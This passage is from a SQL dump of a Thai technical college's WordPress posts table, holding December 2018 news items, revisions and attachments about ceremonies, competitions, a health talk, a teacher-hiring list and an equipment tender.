'', '2018-12-06 13:48:27', '2018-12-06 06:48:27', '', 4739, 'http://www.technicrayong.ac.th/4739-revision-v1/', 0, 'revision', '', 0),
(4742, 3, '2018-12-06 13:55:31', '2018-12-06 06:55:31', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.718439368532254&type=3\"><img class=\"aligncenter size-full wp-image-4743\" src=\"/wp-content/uploads/2018/12/6-12-2561-13-56-16.jpg\" alt=\"\" width=\"454\" height=\"608\" /></a>', 'ในวันอังคารที่ ๔ ธันวาคม ๒๕๖๑ วิทยาลัยเทคนิคระยอง นำโดยว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร คณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา วิทยาลัยเทคนิคระยอง เข้าร่วมพิธีทำบุญตักบาตร และปฏิบัติธรรม เนื่องในวันคล้ายวันเฉลิมพระชนมพรรษา พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช บรมนาถบพิตร ณ โดมเอนกประสงค์ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b9%83%e0%b8%99%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%94-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1', '', '', '2018-12-06 13:55:31', '2018-12-06 06:55:31', '', 0, 'http://www.technicrayong.ac.th/?p=4742', 216, 'post', '', 0),
(4743, 3, '2018-12-06 13:53:45', '2018-12-06 06:53:45', '', '6-12-2561 13-56-16', '', 'inherit', 'closed', 'closed', '', '6-12-2561-13-56-16', '', '', '2018-12-06 13:53:45', '2018-12-06 06:53:45', '', 4742, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/6-12-2561-13-56-16.jpg', 0, 'attachment', 'image/jpeg', 0),
(4744, 3, '2018-12-06 13:54:51', '2018-12-06 06:54:51', '', '47358994_718414715201386_3923106467711811584_o', '', 'inherit', 'closed', 'closed', '', '47358994_718414715201386_3923106467711811584_o', '', '', '2018-12-06 13:54:51', '2018-12-06 06:54:51', '', 4742, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/47358994_718414715201386_3923106467711811584_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4745, 3, '2018-12-06 13:55:31', '2018-12-06 06:55:31', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.718439368532254&type=3\"><img class=\"aligncenter size-full wp-image-4743\" src=\"/wp-content/uploads/2018/12/6-12-2561-13-56-16.jpg\" alt=\"\" width=\"454\" height=\"608\" /></a>', 'ในวันอังคารที่ ๔ ธันวาคม ๒๕๖๑ วิทยาลัยเทคนิคระยอง นำโดยว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะผู้บริหาร คณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา วิทยาลัยเทคนิคระยอง เข้าร่วมพิธีทำบุญตักบาตร และปฏิบัติธรรม เนื่องในวันคล้ายวันเฉลิมพระชนมพรรษา พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช บรมนาถบพิตร ณ โดมเอนกประสงค์ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4742-revision-v1', '', '', '2018-12-06 13:55:31', '2018-12-06 06:55:31', '', 4742, 'http://www.technicrayong.ac.th/4742-revision-v1/', 0, 'revision', '', 0),
(4746, 3, '2018-12-06 14:00:39', '2018-12-06 07:00:39', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.718557281853796&type=3\"><img class=\"aligncenter size-full wp-image-4747\" src=\"/wp-content/uploads/2018/12/6-12-2561-14-01-13.jpg\" alt=\"\" width=\"450\" height=\"606\" /></a>', 'วันอังคารที่ ๔ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีปิดงานประชุมองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย การแข่งขันทักษะวิชาชีพและทักษะพื้นฐาน ระดับอาชีวศึกษาจังหวัดระยอง โดยมีนายยุทธนา อ่อนส้มกฤษ รองผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นผู้สรุปผลการแข่งขันในครั้งนี้ ณ อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ad%e0%b8%b1%e0%b8%87%e0%b8%84%e0%b8%b2%e0%b8%a3%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%94-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1-%e0%b9%92', '', '', '2018-12-06 14:00:39', '2018-12-06 07:00:39', '', 0, 'http://www.technicrayong.ac.th/?p=4746', 215, 'post', '', 0),
(4747, 3, '2018-12-06 13:58:20', '2018-12-06 06:58:20', '', '6-12-2561 14-01-13', '', 'inherit', 'closed', 'closed', '', '6-12-2561-14-01-13', '', '', '2018-12-06 13:58:20', '2018-12-06 06:58:20', '', 4746, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/6-12-2561-14-01-13.jpg', 0, 'attachment', 'image/jpeg', 0),
(4748, 3, '2018-12-06 14:00:01', '2018-12-06 07:00:01', '', '47575890_718557321853792_1059787509615034368_o', '', 'inherit', 'closed', 'closed', '', '47575890_718557321853792_1059787509615034368_o', '', '', '2018-12-06 14:00:01', '2018-12-06 07:00:01', '', 4746, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/47575890_718557321853792_1059787509615034368_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4749, 3, '2018-12-06 14:00:39', '2018-12-06 07:00:39', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.718557281853796&type=3\"><img class=\"aligncenter size-full wp-image-4747\" src=\"/wp-content/uploads/2018/12/6-12-2561-14-01-13.jpg\" alt=\"\" width=\"450\" height=\"606\" /></a>', 'วันอังคารที่ ๔ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีปิดงานประชุมองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย การแข่งขันทักษะวิชาชีพและทักษะพื้นฐาน ระดับอาชีวศึกษาจังหวัดระยอง โดยมีนายยุทธนา อ่อนส้มกฤษ รองผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นผู้สรุปผลการแข่งขันในครั้งนี้ ณ อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4746-revision-v1', '', '', '2018-12-06 14:00:39', '2018-12-06 07:00:39', '', 4746, 'http://www.technicrayong.ac.th/4746-revision-v1/', 0, 'revision', '', 0),
(4750, 3, '2018-12-06 14:00:54', '2018-12-06 07:00:54', '<a href=\"https://www.facebook.com/profile.php?id=100010985913485&sk=photos&collection_token=100010985913485%3A2305272732%3A69&set=a.718557281853796&type=3\"><img class=\"aligncenter size-full wp-image-4747\" src=\"/wp-content/uploads/2018/12/6-12-2561-14-01-13.jpg\" alt=\"\" width=\"450\" height=\"606\" /></a>', 'วันอังคารที่ ๔ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นประธานในพิธีปิดงานประชุมองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย การแข่งขันทักษะวิชาชีพและทักษะพื้นฐาน ระดับอาชีวศึกษาจังหวัดระยอง โดยมีนายยุทธนา อ่อนส้มกฤษ รองผู้อำนวยการวิทยาลัยเทคนิคระยอง เป็นผู้สรุปผลการแข่งขันในครั้งนี้ ณ อาคาร อบจ. วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4746-autosave-v1', '', '', '2018-12-06 14:00:54', '2018-12-06 07:00:54', '', 4746, 'http://www.technicrayong.ac.th/4746-autosave-v1/', 0, 'revision', '', 0),
(4751, 3, '2018-12-06 14:07:04', '2018-12-06 07:07:04', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D719129355129922%26id%3D100010985913485&width=500\" width=\"500\" height=\"781\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๕ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วย คณะผู้บริหาร และคณะครู ร่วมพิธีทำบุญตักบาตรอุทิศถวายพระราชกุศล พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช บรมนาถบพิตร เนื่องในวันคล้ายวันเฉลิมพระชนมพรรษา วันชาติ และวันพ่อแห่งชาติประจำปี ๒๕๖๑ ณ บริเวณสวนศรีเมือง อ.เมือง จ.ระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%b8%e0%b8%98%e0%b8%97%e0%b8%b5%e0%b9%88%e2%80%8b-%e0%b9%95-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1%e2%80%8b-%e0%b9%92%e0%b9%95', '', '', '2018-12-06 14:07:04', '2018-12-06 07:07:04', '', 0, 'http://www.technicrayong.ac.th/?p=4751', 214, 'post', '', 0),
(4752, 3, '2018-12-06 14:06:43', '2018-12-06 07:06:43', '', '47427745_719128828463308_2380837106751635456_n', '', 'inherit', 'closed', 'closed', '', '47427745_719128828463308_2380837106751635456_n', '', '', '2018-12-06 14:06:43', '2018-12-06 07:06:43', '', 4751, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/47427745_719128828463308_2380837106751635456_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(4753, 3, '2018-12-06 14:07:04', '2018-12-06 07:07:04', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D719129355129922%26id%3D100010985913485&width=500\" width=\"500\" height=\"781\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพุธที่ ๕ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง พร้อมด้วย คณะผู้บริหาร และคณะครู ร่วมพิธีทำบุญตักบาตรอุทิศถวายพระราชกุศล พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช บรมนาถบพิตร เนื่องในวันคล้ายวันเฉลิมพระชนมพรรษา วันชาติ และวันพ่อแห่งชาติประจำปี ๒๕๖๑ ณ บริเวณสวนศรีเมือง อ.เมือง จ.ระยอง', '', 'inherit', 'closed', 'closed', '', '4751-revision-v1', '', '', '2018-12-06 14:07:04', '2018-12-06 07:07:04', '', 4751, 'http://www.technicrayong.ac.th/4751-revision-v1/', 0, 'revision', '', 0),
(4754, 3, '2018-12-06 15:44:38', '2018-12-06 08:44:38', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-8-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิ์สอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ครูอัตราจ้าง จำนวน ๘ อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97-6', '', '', '2018-12-06 15:44:38', '2018-12-06 08:44:38', '', 0, 'http://www.technicrayong.ac.th/?p=4754', 213, 'post', '', 0),
(4755, 3, '2018-12-06 15:44:21', '2018-12-06 08:44:21', '', 'ผู้มีสิทธิ์สอบคัดเลือก ครูอัตราจ้าง 8 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97%e0%b8%98%e0%b8%b4%e0%b9%8c%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%a5%e0%b8%b7%e0%b8%ad%e0%b8%81', '', '', '2018-12-06 15:44:21', '2018-12-06 08:44:21', '', 4754, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/ผู้มีสิทธิ์สอบคัดเลือก-ครูอัตราจ้าง-8-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(4756, 3, '2018-12-06 15:44:38', '2018-12-06 08:44:38', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81-%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-8-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิ์สอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ครูอัตราจ้าง จำนวน ๘ อัตรา', '', 'inherit', 'closed', 'closed', '', '4754-revision-v1', '', '', '2018-12-06 15:44:38', '2018-12-06 08:44:38', '', 4754, 'http://www.technicrayong.ac.th/4754-revision-v1/', 0, 'revision', '', 0),
(4758, 3, '2018-12-06 16:11:19', '2018-12-06 09:11:19', '', '27-6-2561 10-59-50', '', 'inherit', 'closed', 'closed', '', '27-6-2561-10-59-50-2', '', '', '2018-12-06 16:11:19', '2018-12-06 09:11:19', '', 1659, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/27-6-2561-10-59-50.jpg', 0, 'attachment', 'image/jpeg', 0),
(4760, 3, '2018-12-06 16:12:33', '2018-12-06 09:12:33', '', 'Picture1', '', 'inherit', 'closed', 'closed', '', 'picture1-2', '', '', '2018-12-06 16:12:33', '2018-12-06 09:12:33', '', 1659, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/Picture1.png', 0, 'attachment', 'image/png', 0),
(4761, 3, '2018-12-06 16:13:26', '2018-12-06 09:13:26', '<img class=\"aligncenter size-full wp-image-4758\" src=\"/wp-content/uploads/2018/12/27-6-2561-10-59-50.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-4760\" src=\"/wp-content/uploads/2018/12/Picture1.png\" alt=\"\" width=\"355\" height=\"103\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1654\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h3><a href=\"/ข้อมูลงบประมาณ61\"><span style=\"color: #ff0000;\">--->ข้อมูลงบประมาณ ปีงบประมาณ 2561<---</span></a></h3>\r\n<h4><a href=\"/แผนปฏิบัติราชการ\"><span style=\"color: #ff6600;\">** แผนปฏิบัติราชการ</span></a></h4>\r\n<h4><a href=\"/แผนพัฒนาสถานศึกษา\"><span style=\"color: #ff6600;\">** แผนพัฒนาสถานศึกษา </span></a></h4>\r\n<h4><a href=\"/แผนโครงการกิจกรรมชมรมว\"><span style=\"color: #ff6600;\">** แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ </span></a></h4>\r\n<h4><a href=\"/รายงานผลการปฏิบัติงานต\"><span style=\"color: #ff00ff;\">** รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</span></a></h4>\r\n<h4><a href=\"/ปฏิทินปฏิบัติงาน\"><span style=\"color: #008000;\">** ปฏิทินปฏิบัติงาน</span></a></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-1-1.doc\">** แบบฟอร์ม สผ.งาน</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-1-1.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มโครงการ.xls\">** แบบฟอร์มโครงการ</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ.xls\">** แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</a></span></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n\r\n ', 'งานวางแผนและงบประมาณ', '', 'inherit', 'closed', 'closed', '', '1659-revision-v1', '', '', '2018-12-06 16:13:26', '2018-12-06 09:13:26', '', 1659, 'http://www.technicrayong.ac.th/1659-revision-v1/', 0, 'revision', '', 0),
(4762, 3, '2018-12-07 12:55:22', '2018-12-07 05:55:22', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D719729858403205%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ ๖ ธันวาคม ๒๕๖๑ สำนักงานสาธารณสุขจังหวัดระยอง เข้ามาให้ความรู้เกี่ยวกับการป้องกันโรคติดต่อทางเพศสัมพันธ์ เนื่องในวันเอดส์โลก โดยให้นักเรียน นักศึกษา ตอบคำถามเพื่อรับของรางวัล ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%96-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84%e0%b8%a1', '', '', '2018-12-07 12:55:22', '2018-12-07 05:55:22', '', 0, 'http://www.technicrayong.ac.th/?p=4762', 212, 'post', '', 0),
(4763, 3, '2018-12-07 12:54:43', '2018-12-07 05:54:43', '', '47575742_719723311737193_1478832316041134080_o', '', 'inherit', 'closed', 'closed', '', '47575742_719723311737193_1478832316041134080_o', '', '', '2018-12-07 12:54:43', '2018-12-07 05:54:43', '', 4762, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/47575742_719723311737193_1478832316041134080_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4764, 3, '2018-12-07 12:55:22', '2018-12-07 05:55:22', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D719729858403205%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ ๖ ธันวาคม ๒๕๖๑ สำนักงานสาธารณสุขจังหวัดระยอง เข้ามาให้ความรู้เกี่ยวกับการป้องกันโรคติดต่อทางเพศสัมพันธ์ เนื่องในวันเอดส์โลก โดยให้นักเรียน นักศึกษา ตอบคำถามเพื่อรับของรางวัล ณ โดมหน้าองค์พระวิษณุกรรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4762-revision-v1', '', '', '2018-12-07 12:55:22', '2018-12-07 05:55:22', '', 4762, 'http://www.technicrayong.ac.th/4762-revision-v1/', 0, 'revision', '', 0),
(4765, 3, '2018-12-07 13:00:02', '2018-12-07 06:00:02', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D719752335067624%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ ๖ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง คณะครู เข้าร่วมการประชุมเตรียมความพร้อมการแข่งขันทักษะวิชาชีพการโรงแรม ระดับภาค ภาคตะวันออก และกรุงเทพมหานคร ประจำปีการศึกษา ๒๕๖๑ \"การบริการอาหารและเครื่องดื่ม\" Food and Beverage Service ณ ห้องปฏิบัติการอาหารและเครื่องดื่ม อาคารปฏิบัติการโรงแรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%96-%e0%b8%98%e0%b8%b1%e0%b8%99%e0%b8%a7%e0%b8%b2%e0%b8%84-2', '', '', '2018-12-07 13:00:02', '2018-12-07 06:00:02', '', 0, 'http://www.technicrayong.ac.th/?p=4765', 211, 'post', '', 0),
(4766, 3, '2018-12-07 12:59:39', '2018-12-07 05:59:39', '', '47573800_719750965067761_4495933029142757376_o', '', 'inherit', 'closed', 'closed', '', '47573800_719750965067761_4495933029142757376_o', '', '', '2018-12-07 12:59:39', '2018-12-07 05:59:39', '', 4765, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/47573800_719750965067761_4495933029142757376_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4767, 3, '2018-12-07 13:00:02', '2018-12-07 06:00:02', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D719752335067624%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ ๖ ธันวาคม ๒๕๖๑ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง คณะครู เข้าร่วมการประชุมเตรียมความพร้อมการแข่งขันทักษะวิชาชีพการโรงแรม ระดับภาค ภาคตะวันออก และกรุงเทพมหานคร ประจำปีการศึกษา ๒๕๖๑ \"การบริการอาหารและเครื่องดื่ม\" Food and Beverage Service ณ ห้องปฏิบัติการอาหารและเครื่องดื่ม อาคารปฏิบัติการโรงแรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4765-revision-v1', '', '', '2018-12-07 13:00:02', '2018-12-07 06:00:02', '', 4765, 'http://www.technicrayong.ac.th/4765-revision-v1/', 0, 'revision', '', 0),
(4768, 3, '2018-12-08 00:09:12', '2018-12-07 17:09:12', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%97%E0%B8%94%E0%B8%A5%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%A7%E0%B8%B4%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%B0%E0%B8%AB%E0%B9%8C%E0%B9%84%E0%B8%9F%E0%B8%9F%E0%B9%89%E0%B8%B2%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C%E0%B8%A2%E0%B8%B2%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ประกวดราคาซื้อครุภัณฑ์ชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์ จำนวน ๑ ชุด ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%84-4', '', '', '2018-12-08 00:09:12', '2018-12-07 17:09:12', '', 0, 'http://www.technicrayong.ac.th/?p=4768', 210, 'post', '', 0),
(4769, 3, '2018-12-08 00:08:52', '2018-12-07 17:08:52', '', 'ประกวดราคาชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%a7%e0%b8%94%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%b2%e0%b8%8a%e0%b8%b8%e0%b8%94%e0%b8%97%e0%b8%94%e0%b8%a5%e0%b8%ad%e0%b8%87%e0%b9%81%e0%b8%a5%e0%b8%b0%e0%b9%80', '', '', '2018-12-08 00:08:52', '2018-12-07 17:08:52', '', 4768, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/12/ประกวดราคาชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์.pdf', 0, 'attachment', 'application/pdf', 0),
(4770, 3, '2018-12-08 00:09:12', '2018-12-07 17:09:12', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F12%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%A7%E0%B8%94%E0%B8%A3%E0%B8%B2%E0%B8%84%E0%B8%B2%E0%B8%8A%E0%B8%B8%E0%B8%94%E0%B8%97%E0%B8%94%E0%B8%A5%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%A7%E0%B8%B4%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%B0%E0%B8%AB%E0%B9%8C%E0%B9%84%E0%B8%9F%E0%B8%9F%E0%B9%89%E0%B8%B2%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C%E0%B8%A2%E0%B8%B2%E0%B8%99%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ 